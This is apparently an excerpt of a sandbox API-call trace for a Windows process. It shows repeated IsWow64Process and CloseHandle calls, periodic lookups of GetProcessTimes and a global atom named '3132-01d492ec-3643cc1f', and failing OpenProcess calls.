	[0128.869] CloseHandle (hObject=0x2dc) returned 1
	[0128.869] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.869] CloseHandle (hObject=0x2dc) returned 1
	[0128.869] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.869] CloseHandle (hObject=0x2dc) returned 1
	[0128.870] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.870] CloseHandle (hObject=0x2dc) returned 1
	[0128.870] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.870] CloseHandle (hObject=0x2dc) returned 1
	[0128.870] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.870] CloseHandle (hObject=0x2dc) returned 1
	[0128.870] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.870] CloseHandle (hObject=0x2dc) returned 1
	[0128.871] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.871] CloseHandle (hObject=0x2dc) returned 1
	[0128.871] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.871] CloseHandle (hObject=0x2dc) returned 1
	[0128.871] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.871] CloseHandle (hObject=0x2dc) returned 1
	[0128.871] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.871] CloseHandle (hObject=0x2dc) returned 1
	[0128.871] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.871] CloseHandle (hObject=0x2dc) returned 1
	[0128.872] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.872] CloseHandle (hObject=0x2dc) returned 1
	[0128.872] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.872] CloseHandle (hObject=0x2dc) returned 1
	[0128.872] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.872] CloseHandle (hObject=0x2dc) returned 1
	[0128.872] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.951] CloseHandle (hObject=0x2dc) returned 1
	[0128.952] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.952] CloseHandle (hObject=0x2dc) returned 1
	[0128.952] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.952] CloseHandle (hObject=0x2dc) returned 1
	[0128.952] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.963] CloseHandle (hObject=0x2dc) returned 1
	[0128.964] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.964] CloseHandle (hObject=0x2dc) returned 1
	[0128.964] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.964] CloseHandle (hObject=0x2dc) returned 1
	[0128.965] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.965] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0128.965] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0128.965] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.966] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0128.966] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.966] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0128.966] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0128.966] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0128.966] CloseHandle (hObject=0x2dc) returned 1
	[0128.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0128.966] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.967] CloseHandle (hObject=0x2dc) returned 1
	[0128.967] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.967] CloseHandle (hObject=0x2dc) returned 1
	[0128.967] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.967] CloseHandle (hObject=0x2dc) returned 1
	[0128.967] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.967] CloseHandle (hObject=0x2dc) returned 1
	[0128.967] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.967] CloseHandle (hObject=0x2dc) returned 1
	[0129.001] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.001] CloseHandle (hObject=0x2dc) returned 1
	[0129.001] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.001] CloseHandle (hObject=0x2dc) returned 1
	[0129.002] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.002] CloseHandle (hObject=0x2dc) returned 1
	[0129.002] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.002] CloseHandle (hObject=0x2dc) returned 1
	[0129.002] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.002] CloseHandle (hObject=0x2dc) returned 1
	[0129.002] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.002] CloseHandle (hObject=0x2dc) returned 1
	[0129.003] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.003] CloseHandle (hObject=0x2dc) returned 1
	[0129.003] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.003] CloseHandle (hObject=0x2dc) returned 1
	[0129.003] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.003] CloseHandle (hObject=0x2dc) returned 1
	[0129.003] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.003] CloseHandle (hObject=0x2dc) returned 1
	[0129.004] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.004] CloseHandle (hObject=0x2dc) returned 1
	[0129.004] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.004] CloseHandle (hObject=0x2dc) returned 1
	[0129.004] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.004] CloseHandle (hObject=0x2dc) returned 1
	[0129.004] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.004] CloseHandle (hObject=0x2dc) returned 1
	[0129.005] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.005] CloseHandle (hObject=0x2dc) returned 1
	[0129.005] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.005] CloseHandle (hObject=0x2dc) returned 1
	[0129.005] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.005] CloseHandle (hObject=0x2dc) returned 1
	[0129.005] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.005] CloseHandle (hObject=0x2dc) returned 1
	[0129.006] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.006] CloseHandle (hObject=0x2dc) returned 1
	[0129.006] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.006] CloseHandle (hObject=0x2dc) returned 1
	[0129.006] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.006] CloseHandle (hObject=0x2dc) returned 1
	[0129.006] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.006] CloseHandle (hObject=0x2dc) returned 1
	[0129.006] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.007] CloseHandle (hObject=0x2dc) returned 1
	[0129.007] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.007] CloseHandle (hObject=0x2dc) returned 1
	[0129.007] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.007] CloseHandle (hObject=0x2dc) returned 1
	[0129.007] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.007] CloseHandle (hObject=0x2dc) returned 1
	[0129.007] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.007] CloseHandle (hObject=0x2dc) returned 1
	[0129.008] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.008] CloseHandle (hObject=0x2dc) returned 1
	[0129.008] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.008] CloseHandle (hObject=0x2dc) returned 1
	[0129.008] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.008] CloseHandle (hObject=0x2dc) returned 1
	[0129.008] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.009] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0129.009] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0129.009] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.009] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0129.009] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.010] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0129.010] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0129.010] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0129.010] CloseHandle (hObject=0x2dc) returned 1
	[0129.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0129.010] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.010] CloseHandle (hObject=0x2dc) returned 1
	[0129.010] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.010] CloseHandle (hObject=0x2dc) returned 1
	[0129.011] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.011] CloseHandle (hObject=0x2dc) returned 1
	[0129.011] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.011] CloseHandle (hObject=0x2dc) returned 1
	[0129.011] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.011] CloseHandle (hObject=0x2dc) returned 1
	[0129.050] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.051] CloseHandle (hObject=0x2dc) returned 1
	[0129.051] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.051] CloseHandle (hObject=0x2dc) returned 1
	[0129.051] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.051] CloseHandle (hObject=0x2dc) returned 1
	[0129.051] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.051] CloseHandle (hObject=0x2dc) returned 1
	[0129.051] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.051] CloseHandle (hObject=0x2dc) returned 1
	[0129.052] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.052] CloseHandle (hObject=0x2dc) returned 1
	[0129.052] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.052] CloseHandle (hObject=0x2dc) returned 1
	[0129.052] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.052] CloseHandle (hObject=0x2dc) returned 1
	[0129.052] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.052] CloseHandle (hObject=0x2dc) returned 1
	[0129.053] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.053] CloseHandle (hObject=0x2dc) returned 1
	[0129.053] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.053] CloseHandle (hObject=0x2dc) returned 1
	[0129.053] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.053] CloseHandle (hObject=0x2dc) returned 1
	[0129.053] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.053] CloseHandle (hObject=0x2dc) returned 1
	[0129.053] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.053] CloseHandle (hObject=0x2dc) returned 1
	[0129.054] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.054] CloseHandle (hObject=0x2dc) returned 1
	[0129.054] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.054] CloseHandle (hObject=0x2dc) returned 1
	[0129.054] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.054] CloseHandle (hObject=0x2dc) returned 1
	[0129.054] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.054] CloseHandle (hObject=0x2dc) returned 1
	[0129.055] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.055] CloseHandle (hObject=0x2dc) returned 1
	[0129.055] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.055] CloseHandle (hObject=0x2dc) returned 1
	[0129.055] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.055] CloseHandle (hObject=0x2dc) returned 1
	[0129.056] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.056] CloseHandle (hObject=0x2dc) returned 1
	[0129.056] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.056] CloseHandle (hObject=0x2dc) returned 1
	[0129.056] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.056] CloseHandle (hObject=0x2dc) returned 1
	[0129.056] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.056] CloseHandle (hObject=0x2dc) returned 1
	[0129.057] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.057] CloseHandle (hObject=0x2dc) returned 1
	[0129.057] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.057] CloseHandle (hObject=0x2dc) returned 1
	[0129.057] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.057] CloseHandle (hObject=0x2dc) returned 1
	[0129.057] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.057] CloseHandle (hObject=0x2dc) returned 1
	[0129.057] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.057] CloseHandle (hObject=0x2dc) returned 1
	[0129.058] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.058] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0129.058] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0129.059] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.059] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0129.059] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.059] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0129.059] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0129.059] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0129.059] CloseHandle (hObject=0x2dc) returned 1
	[0129.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0129.060] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.060] CloseHandle (hObject=0x2dc) returned 1
	[0129.060] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.060] CloseHandle (hObject=0x2dc) returned 1
	[0129.060] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.060] CloseHandle (hObject=0x2dc) returned 1
	[0129.060] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.060] CloseHandle (hObject=0x2dc) returned 1
	[0129.061] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.061] CloseHandle (hObject=0x2dc) returned 1
	[0129.100] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.100] CloseHandle (hObject=0x2dc) returned 1
	[0129.100] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.100] CloseHandle (hObject=0x2dc) returned 1
	[0129.101] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.101] CloseHandle (hObject=0x2dc) returned 1
	[0129.101] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.101] CloseHandle (hObject=0x2dc) returned 1
	[0129.101] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.101] CloseHandle (hObject=0x2dc) returned 1
	[0129.101] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.101] CloseHandle (hObject=0x2dc) returned 1
	[0129.101] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.102] CloseHandle (hObject=0x2dc) returned 1
	[0129.102] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.102] CloseHandle (hObject=0x2dc) returned 1
	[0129.102] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.102] CloseHandle (hObject=0x2dc) returned 1
	[0129.102] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.102] CloseHandle (hObject=0x2dc) returned 1
	[0129.102] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.102] CloseHandle (hObject=0x2dc) returned 1
	[0129.103] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.103] CloseHandle (hObject=0x2dc) returned 1
	[0129.103] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.103] CloseHandle (hObject=0x2dc) returned 1
	[0129.103] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.103] CloseHandle (hObject=0x2dc) returned 1
	[0129.103] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.103] CloseHandle (hObject=0x2dc) returned 1
	[0129.104] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.111] CloseHandle (hObject=0x2dc) returned 1
	[0129.111] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.111] CloseHandle (hObject=0x2dc) returned 1
	[0129.111] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.111] CloseHandle (hObject=0x2dc) returned 1
	[0129.111] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.111] CloseHandle (hObject=0x2dc) returned 1
	[0129.112] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.112] CloseHandle (hObject=0x2dc) returned 1
	[0129.112] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.112] CloseHandle (hObject=0x2dc) returned 1
	[0129.112] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.112] CloseHandle (hObject=0x2dc) returned 1
	[0129.112] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.112] CloseHandle (hObject=0x2dc) returned 1
	[0129.113] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.113] CloseHandle (hObject=0x2dc) returned 1
	[0129.113] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.113] CloseHandle (hObject=0x2dc) returned 1
	[0129.113] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.113] CloseHandle (hObject=0x2dc) returned 1
	[0129.113] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.113] CloseHandle (hObject=0x2dc) returned 1
	[0129.113] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.114] CloseHandle (hObject=0x2dc) returned 1
	[0129.114] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.114] CloseHandle (hObject=0x2dc) returned 1
	[0129.114] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.114] CloseHandle (hObject=0x2dc) returned 1
	[0129.114] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.115] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0129.115] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0129.115] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.115] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0129.115] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.116] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0129.116] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0129.116] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0129.116] CloseHandle (hObject=0x2dc) returned 1
	[0129.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0129.116] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.116] CloseHandle (hObject=0x2dc) returned 1
	[0129.117] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.117] CloseHandle (hObject=0x2dc) returned 1
	[0129.117] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.117] CloseHandle (hObject=0x2dc) returned 1
	[0129.117] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.117] CloseHandle (hObject=0x2dc) returned 1
	[0129.117] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.117] CloseHandle (hObject=0x2dc) returned 1
	[0129.150] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.150] CloseHandle (hObject=0x2dc) returned 1
	[0129.151] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.151] CloseHandle (hObject=0x2dc) returned 1
	[0129.151] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.151] CloseHandle (hObject=0x2dc) returned 1
	[0129.151] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.151] CloseHandle (hObject=0x2dc) returned 1
	[0129.151] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
